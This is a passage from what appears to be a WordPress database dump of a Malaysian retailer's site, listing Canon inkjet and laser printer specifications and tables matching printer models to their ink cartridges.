TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:23:44','2019-09-25 02:23:44','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3332,1,'2019-09-25 10:13:39','2019-09-25 02:13:39','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 